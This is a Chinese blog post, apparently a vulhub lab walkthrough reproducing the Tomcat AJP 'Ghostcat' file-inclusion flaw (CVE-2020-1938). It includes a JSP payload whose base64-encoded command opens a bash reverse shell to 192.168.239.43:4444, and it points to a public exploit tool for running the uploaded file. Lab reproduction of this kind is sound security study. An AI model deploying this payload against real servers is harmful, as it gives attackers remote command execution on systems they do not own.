热门标签
热门文章
- 1ClickHouse高级性能调优和优化技巧_clickhouse add index
- 2用通俗易懂的方式讲解大模型:ChatGLM3-6B 部署指南_chatglm3-6b/resolve/main/config.json
- 3python-https 忽略证书验证_pycharm disable certificate validation
- 4阿里巴巴测试岗面试记:二面被按地上血虐,所幸Offer已到手..._阿里外包二面
- 5org/apache/commons/logging/LogFactory
- 6SoloX使用所遇问题记录_solox安装失败
- 7ubuntu 16.04 安装配置 python3.6
- 8Bioinformatics | 预测药物相互作用的多模式深度学习框架_a multimodal deep learningramework for predicting
- 9idea上的maven形式的java web项目打包部署到linux的tomcat上_idea 接口发到linux 的tomcat中
- 10uniapp 电商小程序 置顶特效/分享特效/红包特效 简单实现效果_uniapp特效动画
当前位置: article > 正文
vulhub中Aapache Tomcat AJP 文件包含漏洞复现(CVE-2020-1938)
作者:笔触狂放9 | 2024-03-07 01:54:01
赞
踩
vulhub中Aapache Tomcat AJP 文件包含漏洞复现(CVE-2020-1938)
查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。
利用如下工具均可测试漏洞:
工具需要用到python2,
如果需要进一步利用需要向服务器的/webapps/ROOT目录下上传恶意文件
<%Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS40My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}");%>利用工具https://github.com/00theway/Ghostcat-CNVD-2020-10487
进行执行上传的恶意文件
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/202869
推荐阅读
相关标签
